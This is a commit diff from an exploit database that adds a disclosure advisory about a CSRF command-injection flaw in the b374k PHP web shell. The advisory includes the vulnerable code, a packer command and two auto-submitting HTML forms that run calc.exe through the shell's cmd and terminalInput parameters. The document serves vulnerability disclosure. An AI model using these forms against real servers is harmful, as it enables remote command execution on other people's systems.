DB: 2015-11-14
1 new exploits
This commit is contained in:
parent
4ab205abc3
commit
ec2ecc7715
2 changed files with 155 additions and 0 deletions
|
@ -34959,3 +34959,4 @@ id,file,description,date,author,platform,type,port
|
||||||
38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
||||||
38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
||||||
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
|
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
|
||||||
|
38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
154
platforms/php/webapps/38688.txt
Executable file
154
platforms/php/webapps/38688.txt
Executable file
|
@ -0,0 +1,154 @@
|
||||||
|
[+] Credits: hyp3rlinx
|
||||||
|
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
|
||||||
|
[+] Source:
|
||||||
|
http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
============================================
|
||||||
|
github.com/b374k/b374k
|
||||||
|
code.google.com/p/b374k-shell/downloads/list
|
||||||
|
code.google.com/archive/p/b374k-shell/
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
==============================================
|
||||||
|
b374k versions 3.2.3 and 2.8
|
||||||
|
|
||||||
|
b374k is a PHP Webshell with many features such as:
|
||||||
|
|
||||||
|
File manager (view, edit, rename, delete, upload, download as archive,etc)
|
||||||
|
Command execution, Script execution (php, perl, python, ruby, java,
|
||||||
|
node.js, c)
|
||||||
|
Give you shell via bind/reverse shell connect
|
||||||
|
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more
|
||||||
|
using ODBC or PDO)
|
||||||
|
Process list/Task manager.
|
||||||
|
|
||||||
|
This is useful for system/web admin to do remote management without opening
|
||||||
|
cpanel, connecting using ssh,
|
||||||
|
ftp etc. All actions take place within a web browser.
|
||||||
|
|
||||||
|
Note:
|
||||||
|
b374k is considered by some as a malicious backdoor and is flagged by some
|
||||||
|
AV upon download.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
=============================
|
||||||
|
CSRF Remote Command Injection
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Details:
|
||||||
|
=====================
|
||||||
|
|
||||||
|
No CSRF protection exists in b374k Web Shell allowing arbitrary OS command
|
||||||
|
injection, if currently
|
||||||
|
logged in user visits our malicious website or clicks our infected linxs.
|
||||||
|
|
||||||
|
vulnerable b374k code:
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the
|
||||||
|
shell.
|
||||||
|
|
||||||
|
<form action='<?php echo $s_self; ?>' method='post'>
|
||||||
|
<input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd'
|
||||||
|
style='width:70%;' value='<?php
|
||||||
|
if(isset($_GP['cmd'])) echo "";
|
||||||
|
|
||||||
|
else echo "- shell command -";
|
||||||
|
?>' />
|
||||||
|
<noscript><input class='inputzbut' type='submit' value='Go !'
|
||||||
|
name='submitcmd' style='width:80px;' /></noscript>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
=================
|
||||||
|
|
||||||
|
Run Windows calc.exe as POC...
|
||||||
|
|
||||||
|
[CSRF Command Injections]
|
||||||
|
|
||||||
|
v3.2
|
||||||
|
|
||||||
|
|
||||||
|
Adding password and packing to b374k single PHP file.
|
||||||
|
|
||||||
|
c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123
|
||||||
|
-s -b -z gzcompress -c 9
|
||||||
|
b374k shell packer 0.4.2
|
||||||
|
|
||||||
|
Filename : myshell.php
|
||||||
|
Password : xxxxxx
|
||||||
|
Theme : default
|
||||||
|
Modules : convert,database,info,mail,network,processes
|
||||||
|
Strip : yes
|
||||||
|
Base64 : yes
|
||||||
|
Compression : gzcompress
|
||||||
|
Compression level : 9
|
||||||
|
Result : Succeeded : [ myshell.php ] Filesize : 111419
|
||||||
|
|
||||||
|
|
||||||
|
(CSRF Command injection 1)
|
||||||
|
|
||||||
|
<form id='ABYSMALGODS' action='
|
||||||
|
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
|
||||||
|
method='post'>
|
||||||
|
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
|
||||||
|
<script>document.getElementById('ABYSMALGODS').submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
v2.8
|
||||||
|
|
||||||
|
(CSRF Command injection 2)
|
||||||
|
|
||||||
|
<form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'>
|
||||||
|
<input id='cmd' type='text' name='cmd' value='calc.exe' />
|
||||||
|
<script>document.getElementById('HELL').submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Description:
|
||||||
|
==================================================
|
||||||
|
|
||||||
|
Request Method(s): [+] POST
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Product: [+] b374k 3.2 and 2.8
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Parameter(s): [+] terminalInput, cmd
|
||||||
|
|
||||||
|
|
||||||
|
Affected Area(s): [+] OS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
Permission is hereby granted for the redistribution of this advisory,
|
||||||
|
provided that it is not altered except by reformatting it, and that due
|
||||||
|
credit is given. Permission is explicitly given for insertion in
|
||||||
|
vulnerability databases and similar, provided that due credit is given to
|
||||||
|
the author.
|
||||||
|
The author is not responsible for any misuse of the information contained
|
||||||
|
herein and prohibits any malicious use of all security related information
|
||||||
|
or exploits by the author or elsewhere.
|
||||||
|
|
||||||
|
by hyp3rlinx
|
Loading…
Add table
Reference in a new issue